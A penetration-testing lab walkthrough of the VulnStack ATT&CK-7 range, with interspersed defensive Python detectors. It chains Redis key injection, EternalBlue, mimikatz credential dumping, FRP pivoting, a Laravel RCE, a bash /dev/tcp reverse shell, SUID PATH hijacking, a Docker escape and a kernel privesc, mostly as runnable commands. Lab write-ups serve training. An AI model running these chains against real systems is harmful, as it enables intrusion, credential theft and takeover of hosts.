VulnStack-ATT&CK-7
2024-11-29 12:57:15 # VulnStack-ATT&CK

Server penetration

Information gathering

nmap -sV -n -v 192.168.3.0/24

192.168.3.7 is found.

nmap -sV -n -v -p 1-65535 192.168.3.7


Unauthenticated Redis access

redis-cli -h 192.168.3.7

GetShell via unauthenticated access

# Generate a key pair
ssh-keygen -t rsa
# Wrap the public key in blank lines and write it to 1.txt
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
# Store the contents of 1.txt as a key in the target's Redis
cat 1.txt | redis-cli -h 192.168.3.7 -p 6379 -x set hello

# In an interactive redis-cli -h 192.168.3.7 session:
config set dir /root/.ssh                # set Redis' dump directory to /root/.ssh/
config set dbfilename authorized_keys    # set the dump file name to authorized_keys
save                                     # write the dataset to the target's disk
# Back on the attacking host:
ssh 192.168.3.7                          # connect

This yields root.
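As an added example, not from the original writeup, here is a Python check an administrator can run over an authorized_keys file: when Redis is abused this way, the file it saves is an RDB dump, so it starts with the REDIS magic and carries binary framing around the injected key, which sshd silently skips. The sample bytes are constructed, and the RDB framing in them is illustrative rather than byte-exact.

```python
import re

RDB_MAGIC = b"REDIS"
# One authorized_keys entry: key type, base64 blob, optional comment.
KEY_RE = re.compile(rb"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+( .*)?$")


def analyze_authorized_keys(data: bytes) -> dict:
    """Flag an authorized_keys file that looks like a Redis RDB dump."""
    result = {"rdb_magic": data.startswith(RDB_MAGIC), "valid_keys": [], "garbage_lines": 0}
    for line in data.split(b"\n"):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        if KEY_RE.match(line):
            parts = line.split(None, 2)
            result["valid_keys"].append(parts[2] if len(parts) > 2 else b"")
        else:
            result["garbage_lines"] += 1  # binary RDB framing, not a key entry
    # sshd tolerates the junk lines, which is why the technique works at all;
    # hardening on the Redis side is requirepass / protected-mode / bind, and
    # renaming or disabling CONFIG so dir and dbfilename cannot be changed.
    result["suspicious"] = result["rdb_magic"] or result["garbage_lines"] > 0
    return result


# Constructed sample of what `config set dir /root/.ssh` + `save` leaves behind.
SAMPLE_RDB = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x05hello\xc2"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0constructed attacker@kali\n\n"
    b"\xff\x8a\x1c\x00\x00\x00\x00\x00\x00"
)
# Constructed sample of a healthy file.
SAMPLE_CLEAN = b"# ops keys\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructed admin@host\n"

if __name__ == "__main__":
    for path in ("/root/.ssh/authorized_keys", "/home/ubuntu/.ssh/authorized_keys"):
        try:
            with open(path, "rb") as f:
                print(path, analyze_authorized_keys(f.read()))
        except OSError:
            pass
```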

First-layer intranet penetration

Information gathering

ifconfig


The second NIC has the address 192.168.52.10, so the host sits in an internal network; run the following command to sweep that network for live hosts:

for k in $(seq 1 254); do ping -c 1 192.168.52.$k | grep "ttl" | awk -F'[ :]+' '{print $4}'; done

This reveals 192.168.52.20 and 192.168.52.30 on that internal network.

Proxy via FRP

kali

nohup ./frps -c frps.ini &
python3 -m http.server 8080

ubuntu

wget http://192.168.3.3:8080/frpc
wget http://192.168.3.3:8080/frpc.ini
chmod +x frpc
nohup ./frpc -c frpc.ini &

nmap information gathering

nmap -sV -p- -n 192.168.52.20
nmap -sV -p- -n 192.168.52.30

192.168.52.20 has ports 22, 8000 and others open; it is a Linux host.

192.168.52.30 has ports 445, 8080 and others open; it is a Windows host.

EternalBlue

msfconsole
setg Proxies socks5:192.168.3.3:6005
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.52.30
run


Check the network adapters

shell ipconfig

This shows a further address, 192.168.93.20.

Second-layer intranet penetration

KSCAN scan

Upload kscan and scan the segment:

kscan_windows_amd64.exe -t 192.168.93.0/24

Live hosts: 192.168.93.10 (Linux), 192.168.93.20 (Windows), 192.168.93.30 (Windows), 192.168.93.40 (Windows).


.30 and .40 both expose port 445, so EternalBlue can be tried. Before attacking, we first use frp to build a tunnel into the second-layer network, the 192.168.93.0 segment.

Find out which host is the domain controller (DC)

ping whoamianony.org


Dump plaintext passwords

upload ~/tq/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
sekurlsa::logonPasswords


The domain administrator's plaintext password is recovered; the next step is to set up a proxy and connect to the DC.

FRP proxy

# frps2.ini  kali

echo '[common]
bind_addr = 0.0.0.0
bind_port = 7788' >frps2.ini

nohup ./frps -c frps2.ini &

# frps3.ini Net1 PC ubuntu

echo '[common]
bind_addr = 192.168.52.10
bind_port = 7799' > frps3.ini

nohup ./frps -c frps3.ini &

# frpc2.ini Net1 PC ubuntu

echo '[common]
server_addr = 192.168.3.3
server_port = 7788
[http_proxy]
type = tcp
local_ip = 192.168.52.10
local_port = 1080
remote_port = 1080' > frpc2.ini

nohup ./frpc -c frpc2.ini &

# frpc3.ini Net2 PC windows
echo '[common]
server_addr = 192.168.52.10
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5' > frpc3.ini

frpc.exe -c frpc3.ini

At this point, port 1080 is the second-layer proxy (it reaches 192.168.93.0/24) and port 6005 is the first-layer proxy (it reaches 192.168.52.0/24).

Connect to the DC

proxychains4 python3 wmiexec-pro.py 'Administrator:Whoami2021@192.168.93.30' exec-command -shell


Compromising the remaining hosts

WIN7

msfconsole
setg Proxies socks5:192.168.3.3:1080
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.93.40
set lport 4466
run


Apart from the hosts above, the first-layer network still has an Ubuntu host, 192.168.52.20, on which we have no shell yet.

Ubuntu

Information gathering

proxychains4 nmap -sV -n -v 192.168.52.20

Port 8000 is open. Visiting it through the proxy shows a Laravel application, and the page is identical to what 192.168.3.7:81 serves directly, so 192.168.3.7 is reverse-proxying it. We therefore test against 192.168.3.7:81.

GetShell

Reference: laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

Verify CVE-2021-3129 with the following request:

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.3.7:81
Content-Type: application/json
Content-Length: 168

{
    "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
    "parameters": {
        "variableName": "jack",
        "viewFile": "jack1"
    }
}
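Added example, not from the writeup or the linked exploit: a small classifier for requests to the Ignition endpoint, the kind of logic a WAF rule or log review needs to separate the harmless verification packet above from actual exploitation. The sample requests are constructed; the real fix is APP_DEBUG=false and upgrading facade/ignition to 2.5.2 or later.

```python
import json

IGNITION_PATH = "/_ignition/execute-solution"
TARGET_SOLUTION = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"
# viewFile values seen in real exploitation point at the app log or a stream wrapper,
# whereas the probe above uses a throwaway name.
EXPLOIT_MARKERS = ("phar://", "php://", "laravel.log", "../")


def classify_request(method: str, path: str, body: str) -> str:
    """Return 'benign', 'probe' or 'exploit' for one HTTP request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != IGNITION_PATH:
        return "benign"
    try:
        payload = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return "probe"  # anything unexpected hitting a debug endpoint deserves a look
    if not isinstance(payload, dict) or payload.get("solution") != TARGET_SOLUTION:
        return "probe"
    params = payload.get("parameters") or {}
    view_file = str(params.get("viewFile", ""))
    if any(marker in view_file for marker in EXPLOIT_MARKERS):
        return "exploit"
    return "probe"  # e.g. the viewFile "jack1" check from the writeup


def triage(requests):
    """Classify a list of (method, path, body) tuples."""
    return [classify_request(*req) for req in requests]


# Constructed sample traffic; the first entry mirrors the verification packet above.
SAMPLE_REQUESTS = [
    ("POST", IGNITION_PATH, json.dumps({
        "solution": TARGET_SOLUTION,
        "parameters": {"variableName": "jack", "viewFile": "jack1"}})),
    ("POST", IGNITION_PATH, json.dumps({
        "solution": TARGET_SOLUTION,
        "parameters": {"variableName": "x",
                       "viewFile": "phar:///var/www/storage/logs/laravel.log"}})),
    ("POST", IGNITION_PATH, "not json"),
    ("GET", "/login", ""),
]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print(verdict, req[0], req[1])
```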


The vulnerability is present; use https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

python3 laravel-CVE-2021-3129-EXP.py http://192.168.3.7:81


Then connect with Godzilla 2 (哥斯拉).


This is a Docker environment and nothing could be executed from the webshell. Note that this shell belongs to 192.168.52.20, so we bounce it back to 192.168.52.10:

bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/65432 <&1'


Search for high-privilege files

find / -perm -u=s -type f 2>/dev/null

/home/jobs/shell is found.


cd /tmp
echo "/bin/bash" > ps           # fake ps that just starts a shell
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH          # make /tmp win the PATH lookup
cd /home/jobs
./shell                         # the SUID binary looks up ps via PATH, so the fake copy runs as root
python -c 'import pty;pty.spawn("/bin/bash")'

Docker escape

192.168.52.20

cd /
mkdir /hack                 # mount point; the following commands refer to /hack
mount /dev/sda1 /hack       # mount the host's root filesystem inside the container
ls /hack
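The mount above only succeeds because the container can see /dev/sda1 and holds CAP_SYS_ADMIN, i.e. it runs with elevated privileges. As an added example (not part of the writeup), this Python helper decodes the CapEff line of /proc/self/status so an operator can check a container's effective capabilities from inside it; the two status texts are constructed samples of Docker's default capability set and a --privileged one.

```python
import re

# Capability bit numbers from linux/capability.h; only the ones that matter
# for breaking container isolation are listed here.
CAP_BITS = {
    "CAP_DAC_READ_SEARCH": 2, "CAP_NET_ADMIN": 12, "CAP_SYS_MODULE": 16,
    "CAP_SYS_RAWIO": 17, "CAP_SYS_PTRACE": 19, "CAP_SYS_ADMIN": 21,
}


def parse_cap_eff(status_text: str) -> int:
    """Extract the effective capability mask from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)$", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)


def risky_caps(cap_eff: int) -> list:
    """Names of the listed capabilities that are set in the mask."""
    return sorted(name for name, bit in CAP_BITS.items() if cap_eff >> bit & 1)


def assess(status_text: str) -> dict:
    caps = risky_caps(parse_cap_eff(status_text))
    # mount(2) needs CAP_SYS_ADMIN; without it the escape shown above fails
    # even if a block device node happens to be visible.
    return {"risky_caps": caps, "has_sys_admin": "CAP_SYS_ADMIN" in caps}


# Constructed samples: Docker's default capability set (a80425fb) and a
# --privileged container with every capability up to bit 37.
DEFAULT_STATUS = "Name:\tbash\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "Name:\tbash\nCapEff:\t0000003fffffffff\n"

if __name__ == "__main__":
    with open("/proc/self/status") as f:
        print(assess(f.read()))
```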

192.168.52.10

ssh-keygen -f hack      # creates the private key hack and the public key hack.pub
chmod 600 hack

192.168.52.20

# Plant a public key in the host's ubuntu account through the mounted filesystem;
# the cp only seeds the file, the echo then overwrites it with hack.pub from 192.168.52.10
cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDH0Pj+AghZo27EjM48eai0FNI/AiJExG6QISl315grBY4yRXlwb1mo6sUnHPRfkUs1XIJq/Ogc1FxFGr3S8VypKMD7cGOsBuGjALgfiXXEGyh4yzuWKG7O+OgAAfEHb4/LwiG8fWcixl14NCxEP7SozIdPhkI17JcFTAy70RmxdoYNJsD+Qa0b4m2gX7kiB5fVrnF266JQwDjpXOSoL8BrAMoTBuJk947OGSlVyZVD40TllLP6q4odylnZ3KS4CUv8p2z8hZoS+W6yUGZoeB6LzS2udqQ1/DDX1qGFH2llra57XCREuoykixGIwXw4HeVTcTPxTa4Ampy3pDHkfKmh root@ubuntu' > /hack/home/ubuntu/.ssh/authorized_keys
cat /hack/home/ubuntu/.ssh/authorized_keys

192.168.52.10

ssh -i hack ubuntu@192.168.52.20

Privilege escalation

uname -a


The kernel is affected by CVE-2021-3493.

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)

Download the exploit to 192.168.52.10 first, then fetch it from 192.168.52.10 onto 192.168.52.20, and run:

gcc exploit.c -o exploit
./exploit
python -c 'import pty;pty.spawn("/bin/bash")'


Related links

Using mimikatz:

https://www.cnblogs.com/n3w1492/p/13734279.html#:~:text=msf%E4%B8%AD%E7%9A%84mimik

Multi-layer frp tunnels:

利用Frp建立多层代理_frp多级代理-CSDN博客

Exploiting CVE-2021-3129:

laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

Exploiting CVE-2021-3493:

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)